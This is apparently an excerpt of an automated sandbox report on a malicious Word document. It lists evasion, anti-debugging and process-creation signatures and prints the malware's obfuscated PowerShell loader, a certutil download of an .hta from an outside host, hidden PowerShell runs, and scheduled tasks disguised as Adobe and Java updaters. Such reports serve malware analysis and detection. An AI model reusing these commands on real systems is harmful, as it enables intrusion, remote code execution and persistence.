Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - select * from Win32_ComputerSystem

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - select * from Win32_NEtworKAdApTErCoNfiGURAtioN
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - select * from Win32_NetworkAdapterConfiguration

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2072	Thread sleep time: -60000s >= -60000s	Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 4032	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1172	Thread sleep count: 129 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1172	Thread sleep time: -7740000s >= -60000s

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Show sources

Source: powershell.exe, 0000000E.00000003.16504702511.05D20000.00000004.sdmp	Binary or memory string: Hyper-V
Source: powershell.exe, 0000000E.00000003.16504702511.05D20000.00000004.sdmp	Binary or memory string: VMware
Source: powershell.exe, 0000000E.00000002.16536082417.020E3000.00000004.sdmp	Binary or memory string: k65"VMware Virtual Platform" { $MachineType="VMware" }
Source: powershell.exe, 0000000E.00000002.16536082417.020E3000.00000004.sdmp	Binary or memory string: VMware Virtual Platformt
Source: powershell.exe, 0000000E.00000003.16504702511.05D20000.00000004.sdmp	Binary or memory string: VMware Virtual PlatformH
Source: powershell.exe, 0000000E.00000003.16504702511.05D20000.00000004.sdmp	Binary or memory string: Hyper-VH
Source: powershell.exe, 0000000E.00000002.16536082417.020E3000.00000004.sdmp	Binary or memory string: [string[]] $pentList = 'hacker', 'malzilla', 'procexp', 'wireshark', 'hxd', 'powershell_ise', 'ida', 'olly', 'fiddler', 'malware', 'vmtoolsd', 'swingbox', 'vboxtray', 'secunia', 'hijack', 'vmtoolsd'81/`
Source: powershell.exe, 0000000E.00000003.16504702511.05D20000.00000004.sdmp	Binary or memory string: VMware Virtual P
Source: powershell.exe, 0000000E.00000003.16504702511.05D20000.00000004.sdmp	Binary or memory string: vmtoolsdH
Source: powershell.exe, 0000000E.00000002.16536082417.020E3000.00000004.sdmp	Binary or memory string: vmtoolsdt
Source: powershell.exe, 0000000E.00000003.16504702511.05D20000.00000004.sdmp	Binary or memory string: vboxtray
Source: powershell.exe, 0000000E.00000003.16504702511.05D20000.00000004.sdmp	Binary or memory string: VMwareH
Source: powershell.exe, 0000000E.00000002.16536082417.020E3000.00000004.sdmp	Binary or memory string: vboxtrayt
Source: powershell.exe, 0000000E.00000002.16536082417.020E3000.00000004.sdmp	Binary or memory string: "VMware Virtual Platform" { $MachineType="VMware" }
Source: powershell.exe, 0000000E.00000002.16536082417.020E3000.00000004.sdmp	Binary or memory string: "Virtual Machine" { $MachineType="Hyper-V" }
Source: powershell.exe, 0000000E.00000002.16536082417.020E3000.00000004.sdmp	Binary or memory string: k/."Virtual Machine" { $MachineType="Hyper-V" }
Source: powershell.exe, 0000000E.00000003.16504702511.05D20000.00000004.sdmp	Binary or memory string: vboxtrayH
Source: powershell.exe, 0000000E.00000003.16504702511.05D20000.00000004.sdmp	Binary or memory string: vmtoolsd
Source: powershell.exe, 0000000E.00000002.16536082417.020E3000.00000004.sdmp	Binary or memory string: [string[]] $pentList = 'hacker', 'malzilla', 'procexp', 'wireshark', 'hxd', 'powershell_ise', 'ida', 'olly', 'fiddler', 'malware', 'vmtoolsd', 'swingbox', 'vboxtray', 'secunia', 'hijack', 'vmtoolsd'
Source: powershell.exe, 0000000E.00000002.16536082417.020E3000.00000004.sdmp	Binary or memory string: Hyper-Vt
Source: powershell.exe, 0000000E.00000002.16536082417.020E3000.00000004.sdmp	Binary or memory string: VMwaret
Source: powershell.exe, 0000000E.00000003.16504702511.05D20000.00000004.sdmp	Binary or memory string: VMware Virtual PlatformTf
Source: powershell.exe, 0000000E.00000003.16504702511.05D20000.00000004.sdmp	Binary or memory string: VMware Virtual PH
Source: powershell.exe, 0000000E.00000003.16504702511.05D20000.00000004.sdmp	Binary or memory string: VMware Virtu$

Queries a list of all running processes

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System information queried: KernelDebuggerInformation

Jump to behavior

Enables debug privileges

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WerFault.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Creates guard pages, often used to prevent reverse engineering and debugging

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Show sources

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\WinDoWS\sysTEm32\CMD.EXe /c%rbH%	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' eChO ieX (gCi ENv:STi).VALUe '	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRshell -noNInteraC -ex byPASs -NopRofIlE -NOExIT -wInDows HiDdEN -	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\certutil.exe 'C:\Windows\System32\certutil.exe' -urlcache -split -f https://mysent.org/access.log.txt C:\Users\user\AppData\Local\Microsoft\Windows\Ringtones\libsys.hta	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'set KjV= SeT-VarIABlE eiP ( [tYPe]('{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}' -F 'D','tioN','onArY','icti','tE','LlEC','[ST','cO','RinG,SYS','OBJ','M.','S.GenerIC.','eCT') ) ; ${tV`R`32} =[tYpE]('{2}{0}{3}{1}'-F'R','loCK','SC','iPtB') ; ${g`Nf} = [type]('{1}{0}' -F'f','RE') ; Set-iTeM ('vAriaB'+'le:R'+'tHA'+'C5') ( [type]('{7}{6}{5}{3}{2}{1}{8}{0}{4}'-f'N','epOi','Ic','v','aGER','et.sEr','Tem.n','sys','NTma') ); seT qcj ( [tyPe]('{1}{3}{6}{4}{5}{0}{2}' -F'uE','sY','st','sTE','WeB','rEQ','M.Net.') ) ; sET-iTem VAriAblE:eSY ( [tyPE]('{1}{0}{4}{2}{3}' -F'YsTeM.NeT.','S','DEN','TIALCAchE','CRe'));set-iTem VARIaBLe:r4imz ( [type]('{2}{4}{0}{3}{1}'-F 'T.EN','iNg','SysTem.te','cOD','X') ) ;If(${pS`Vers`ionTa`Ble}.'P`SVersION'.'MaJ`OR' -GE 3){${g`PF}= ${G`Nf}.'aSsE`mb`Ly'.('{1}{0}' -f'tTYPe','GE').Invoke(('{6}{1}{0}{3}{2}{4}{7}{5}' -f'na','tem.Ma','nt.Autom','geme','ati','.Utils','Sys','on')).'GETFiE`LD'(('{0}{4}{2}{1}{3}'-f 'c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe CMD.ExE /C%OmWi%
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' ecHo IEX (GI enV:Kjv).valUe '
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powERSHeLl -nOnInTeRac -eXecUTiOn byPASs -NOeX -NoPRofiL -WiN hIddEN -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\system32\schtasks.exe' /query
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\findstr.exe 'C:\Windows\system32\findstr.exe' /i AdobeUpdateTaskDailyCore
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RL HIGHEST /F /SC DAILY /ST 10:00 /TN AdobeUpdateTaskDailyCore /TR 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c \'& $env:isjeuccptoxa ($env:jtkfvddqlpyc + $env:kulgweeimqae + $env:lvmhxfvjnrbg + $env:mwniywwkosci)\''
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\system32\schtasks.exe' /query
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\findstr.exe 'C:\Windows\system32\findstr.exe' /i JavaUpdateTaskCore
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\certutil.exe 'C:\Windows\System32\certutil.exe' -urlcache -split -f https://mysent.org/access.log.txt C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\sysmodule.hta
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RL HIGHEST /F /SC DAILY /ST 11:10 /TN JavaUpdateTaskCore /TR C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\sysmodule.hta
Source: C:\Program Files\Common Files\microsoft shared\DW\DW20.EXE	Process created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1516
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c '& $env:isjeuccptoxa ($env:jtkfvddqlpyc + $env:kulgweeimqae + $env:lvmhxfvjnrbg + $env:mwniywwkosci)'
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\sysmodule.hta'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'set KjV= SeT-VarIABlE eiP ( [tYPe]('{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}' -F 'D','tioN','onArY','icti','tE','LlEC','[ST','cO','RinG,SYS','OBJ','M.','S.GenerIC.','eCT') ) ; ${tV`R`32} =[tYpE]('{2}{0}{3}{1}'-F'R','loCK','SC','iPtB') ; ${g`Nf} = [type]('{1}{0}' -F'f','RE') ; Set-iTeM ('vAriaB'+'le:R'+'tHA'+'C5') ( [type]('{7}{6}{5}{3}{2}{1}{8}{0}{4}'-f'N','epOi','Ic','v','aGER','et.sEr','Tem.n','sys','NTma') ); seT qcj ( [tyPe]('{1}{3}{6}{4}{5}{0}{2}' -F'uE','sY','st','sTE','WeB','rEQ','M.Net.') ) ; sET-iTem VAriAblE:eSY ( [tyPE]('{1}{0}{4}{2}{3}' -F'YsTeM.NeT.','S','DEN','TIALCAchE','CRe'));set-iTem VARIaBLe:r4imz ( [type]('{2}{4}{0}{3}{1}'-F 'T.EN','iNg','SysTem.te','cOD','X') ) ;If(${pS`Vers`ionTa`Ble}.'P`SVersION'.'MaJ`OR' -GE 3){${g`PF}= ${G`Nf}.'aSsE`mb`Ly'.('{1}{0}' -f'tTYPe','GE').Invoke(('{6}{1}{0}{3}{2}{4}{7}{5}' -f'na','tem.Ma','nt.Autom','geme','ati','.Utils','Sys','on')).'GETFiE`LD'(('{0}{4}{2}{1}{3}'-f 'c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe CMD.ExE /C%OmWi%
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe unknown

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Show sources

Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\WinDoWS\sysTEm32\CMD.EXe' /c 'SeT STI= $iBHrW = [tyPE]('{2}{7}{8}{3}{0}{5}{1}{6}{4}'-f 'ERi','RING,s','COLLE','En','.obJECT','c.DiCtiONARy[st','yStEM','c','tIoNs.g'); .('{0}{1}{2}'-f'S','ET','-iTEM') ('{0}{2}{1}' -f 'VAr','Le:7B1M','iAB') ([tYPe]('{2}{3}{1}{0}' -f'Ock','l','s','crIptb') ) ; $MZS=[tYPE]('{0}{1}'-F 'R','EF') ; ^&('{1}{2}{0}'-f '-iTEM','SE','T') ('{1}{0}{2}'-f'iAbL','vAr','e:04k') ( [tyPe]('{4}{3}{0}{1}{5}{2}'-f '.seRvICEp','o','AnAGeR','.nET','SySTeM','IntM')) ; $Nva1I = [tyPe]('{0}{1}{6}{4}{2}{5}{3}'-F'SY','StE','t.WE','ueST','.ne','BrEQ','m'); .('{2}{0}{1}' -f'E','M','seT-iT') ('V'+'Ar'+'Ia'+'Ble:kmd') ( [tYPe]('{6}{3}{4}{5}{0}{2}{1}'-F'nTIalcA','HE','c','ste','M.n','eT.CRede','sY')) ; $bqvM = [TypE]('{2}{0}{4}{1}{5}{3}'-F'TE','c','syS','ING','m.tExT.en','Od') ;[string[]] ${P`Ath} = .('{2}{3}{0}{1}' -f 'hi','ldItem','Get-','C') -Recurse -LiteralPath '$env:USERPROFILE\\AppData\\Local\\Microsoft' -ErrorAction ('{1}{4}{0}{3}{2}'-f'tlyC','Si
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'set KjV= SeT-VarIABlE eiP ( [tYPe]('{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}' -F 'D','tioN','onArY','icti','tE','LlEC','[ST','cO','RinG,SYS','OBJ','M.','S.GenerIC.','eCT') ) ; ${tV`R`32} =[tYpE]('{2}{0}{3}{1}'-F'R','loCK','SC','iPtB') ; ${g`Nf} = [type]('{1}{0}' -F'f','RE') ; Set-iTeM ('vAriaB'+'le:R'+'tHA'+'C5') ( [type]('{7}{6}{5}{3}{2}{1}{8}{0}{4}'-f'N','epOi','Ic','v','aGER','et.sEr','Tem.n','sys','NTma') ); seT qcj ( [tyPe]('{1}{3}{6}{4}{5}{0}{2}' -F'uE','sY','st','sTE','WeB','rEQ','M.Net.') ) ; sET-iTem VAriAblE:eSY ( [tyPE]('{1}{0}{4}{2}{3}' -F'YsTeM.NeT.','S','DEN','TIALCAchE','CRe'));set-iTem VARIaBLe:r4imz ( [type]('{2}{4}{0}{3}{1}'-F 'T.EN','iNg','SysTem.te','cOD','X') ) ;If(${pS`Vers`ionTa`Ble}.'P`SVersION'.'MaJ`OR' -GE 3){${g`PF}= ${G`Nf}.'aSsE`mb`Ly'.('{1}{0}' -f'tTYPe','GE').Invoke(('{6}{1}{0}{3}{2}{4}{7}{5}' -f'na','tem.Ma','nt.Autom','geme','ati','.Utils','Sys','on')).'GETFiE`LD'(('{0}{4}{2}{1}{3}'-f 'c
Source: unknown	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RL HIGHEST /F /SC DAILY /ST 10:00 /TN AdobeUpdateTaskDailyCore /TR 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c \'& $env:isjeuccptoxa ($env:jtkfvddqlpyc + $env:kulgweeimqae + $env:lvmhxfvjnrbg + $env:mwniywwkosci)\''
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'set KjV= SeT-VarIABlE eiP ( [tYPe]('{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}' -F 'D','tioN','onArY','icti','tE','LlEC','[ST','cO','RinG,SYS','OBJ','M.','S.GenerIC.','eCT') ) ; ${tV`R`32} =[tYpE]('{2}{0}{3}{1}'-F'R','loCK','SC','iPtB') ; ${g`Nf} = [type]('{1}{0}' -F'f','RE') ; Set-iTeM ('vAriaB'+'le:R'+'tHA'+'C5') ( [type]('{7}{6}{5}{3}{2}{1}{8}{0}{4}'-f'N','epOi','Ic','v','aGER','et.sEr','Tem.n','sys','NTma') ); seT qcj ( [tyPe]('{1}{3}{6}{4}{5}{0}{2}' -F'uE','sY','st','sTE','WeB','rEQ','M.Net.') ) ; sET-iTem VAriAblE:eSY ( [tyPE]('{1}{0}{4}{2}{3}' -F'YsTeM.NeT.','S','DEN','TIALCAchE','CRe'));set-iTem VARIaBLe:r4imz ( [type]('{2}{4}{0}{3}{1}'-F 'T.EN','iNg','SysTem.te','cOD','X') ) ;If(${pS`Vers`ionTa`Ble}.'P`SVersION'.'MaJ`OR' -GE 3){${g`PF}= ${G`Nf}.'aSsE`mb`Ly'.('{1}{0}' -f'tTYPe','GE').Invoke(('{6}{1}{0}{3}{2}{4}{7}{5}' -f'na','tem.Ma','nt.Autom','geme','ati','.Utils','Sys','on')).'GETFiE`LD'(('{0}{4}{2}{1}{3}'-f 'c
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe 'C:\WinDoWS\sysTEm32\CMD.EXe' /c 'SeT STI= $iBHrW = [tyPE]('{2}{7}{8}{3}{0}{5}{1}{6}{4}'-f 'ERi','RING,s','COLLE','En','.obJECT','c.DiCtiONARy[st','yStEM','c','tIoNs.g'); .('{0}{1}{2}'-f'S','ET','-iTEM') ('{0}{2}{1}' -f 'VAr','Le:7B1M','iAB') ([tYPe]('{2}{3}{1}{0}' -f'Ock','l','s','crIptb') ) ; $MZS=[tYPE]('{0}{1}'-F 'R','EF') ; ^&('{1}{2}{0}'-f '-iTEM','SE','T') ('{1}{0}{2}'-f'iAbL','vAr','e:04k') ( [tyPe]('{4}{3}{0}{1}{5}{2}'-f '.seRvICEp','o','AnAGeR','.nET','SySTeM','IntM')) ; $Nva1I = [tyPe]('{0}{1}{6}{4}{2}{5}{3}'-F'SY','StE','t.WE','ueST','.ne','BrEQ','m'); .('{2}{0}{1}' -f'E','M','seT-iT') ('V'+'Ar'+'Ia'+'Ble:kmd') ( [tYPe]('{6}{3}{4}{5}{0}{2}{1}'-F'nTIalcA','HE','c','ste','M.n','eT.CRede','sY')) ; $bqvM = [TypE]('{2}{0}{4}{1}{5}{3}'-F'TE','c','syS','ING','m.tExT.en','Od') ;[string[]] ${P`Ath} = .('{2}{3}{0}{1}' -f 'hi','ldItem','Get-','C') -Recurse -LiteralPath '$env:USERPROFILE\\AppData\\Local\\Microsoft' -ErrorAction ('{1}{4}{0}{3}{2}'-f'tlyC','Si	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'set KjV= SeT-VarIABlE eiP ( [tYPe]('{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}' -F 'D','tioN','onArY','icti','tE','LlEC','[ST','cO','RinG,SYS','OBJ','M.','S.GenerIC.','eCT') ) ; ${tV`R`32} =[tYpE]('{2}{0}{3}{1}'-F'R','loCK','SC','iPtB') ; ${g`Nf} = [type]('{1}{0}' -F'f','RE') ; Set-iTeM ('vAriaB'+'le:R'+'tHA'+'C5') ( [type]('{7}{6}{5}{3}{2}{1}{8}{0}{4}'-f'N','epOi','Ic','v','aGER','et.sEr','Tem.n','sys','NTma') ); seT qcj ( [tyPe]('{1}{3}{6}{4}{5}{0}{2}' -F'uE','sY','st','sTE','WeB','rEQ','M.Net.') ) ; sET-iTem VAriAblE:eSY ( [tyPE]('{1}{0}{4}{2}{3}' -F'YsTeM.NeT.','S','DEN','TIALCAchE','CRe'));set-iTem VARIaBLe:r4imz ( [type]('{2}{4}{0}{3}{1}'-F 'T.EN','iNg','SysTem.te','cOD','X') ) ;If(${pS`Vers`ionTa`Ble}.'P`SVersION'.'MaJ`OR' -GE 3){${g`PF}= ${G`Nf}.'aSsE`mb`Ly'.('{1}{0}' -f'tTYPe','GE').Invoke(('{6}{1}{0}{3}{2}{4}{7}{5}' -f'na','tem.Ma','nt.Autom','geme','ati','.Utils','Sys','on')).'GETFiE`LD'(('{0}{4}{2}{1}{3}'-f 'c
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RL HIGHEST /F /SC DAILY /ST 10:00 /TN AdobeUpdateTaskDailyCore /TR 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c \'& $env:isjeuccptoxa ($env:jtkfvddqlpyc + $env:kulgweeimqae + $env:lvmhxfvjnrbg + $env:mwniywwkosci)\''
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'set KjV= SeT-VarIABlE eiP ( [tYPe]('{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}' -F 'D','tioN','onArY','icti','tE','LlEC','[ST','cO','RinG,SYS','OBJ','M.','S.GenerIC.','eCT') ) ; ${tV`R`32} =[tYpE]('{2}{0}{3}{1}'-F'R','loCK','SC','iPtB') ; ${g`Nf} = [type]('{1}{0}' -F'f','RE') ; Set-iTeM ('vAriaB'+'le:R'+'tHA'+'C5') ( [type]('{7}{6}{5}{3}{2}{1}{8}{0}{4}'-f'N','epOi','Ic','v','aGER','et.sEr','Tem.n','sys','NTma') ); seT qcj ( [tyPe]('{1}{3}{6}{4}{5}{0}{2}' -F'uE','sY','st','sTE','WeB','rEQ','M.Net.') ) ; sET-iTem VAriAblE:eSY ( [tyPE]('{1}{0}{4}{2}{3}' -F'YsTeM.NeT.','S','DEN','TIALCAchE','CRe'));set-iTem VARIaBLe:r4imz ( [type]('{2}{4}{0}{3}{1}'-F 'T.EN','iNg','SysTem.te','cOD','X') ) ;If(${pS`Vers`ionTa`Ble}.'P`SVersION'.'MaJ`OR' -GE 3){${g`PF}= ${G`Nf}.'aSsE`mb`Ly'.('{1}{0}' -f'tTYPe','GE').Invoke(('{6}{1}{0}{3}{2}{4}{7}{5}' -f'na','tem.Ma','nt.Autom','geme','ati','.Utils','Sys','on')).'GETFiE`LD'(('{0}{4}{2}{1}{3}'-f 'c

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: cmd.exe, 00000002.00000002.16511987460.00600000.00000002.sdmp, cmd.exe, 00000004.00000002.16516507372.00560000.00000002.sdmp, powershell.exe, 00000006.00000002.16518212847.005B0000.00000002.sdmp, cmd.exe, 0000000A.00000002.16525924450.005C0000.00000002.sdmp, cmd.exe, 0000000C.00000002.16530293767.005F0000.00000002.sdmp, powershell.exe, 0000000E.00000002.16531939694.00520000.00000002.sdmp	Binary or memory string: Progman
Source: cmd.exe, 00000002.00000002.16511987460.00600000.00000002.sdmp, cmd.exe, 00000004.00000002.16516507372.00560000.00000002.sdmp, powershell.exe, 00000006.00000002.16518212847.005B0000.00000002.sdmp, cmd.exe, 0000000A.00000002.16525924450.005C0000.00000002.sdmp, cmd.exe, 0000000C.00000002.16530293767.005F0000.00000002.sdmp, powershell.exe, 0000000E.00000002.16531939694.00520000.00000002.sdmp	Binary or memory string: Program Manager
Source: cmd.exe, 00000002.00000002.16511987460.00600000.00000002.sdmp, cmd.exe, 00000004.00000002.16516507372.00560000.00000002.sdmp, powershell.exe, 00000006.00000002.16518212847.005B0000.00000002.sdmp, cmd.exe, 0000000A.00000002.16525924450.005C0000.00000002.sdmp, cmd.exe, 0000000C.00000002.16530293767.005F0000.00000002.sdmp, powershell.exe, 0000000E.00000002.16531939694.00520000.00000002.sdmp	Binary or memory string: Shell_TrayWnd

Language, Device and Operating System Detection:

Queries the installation date of Windows

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
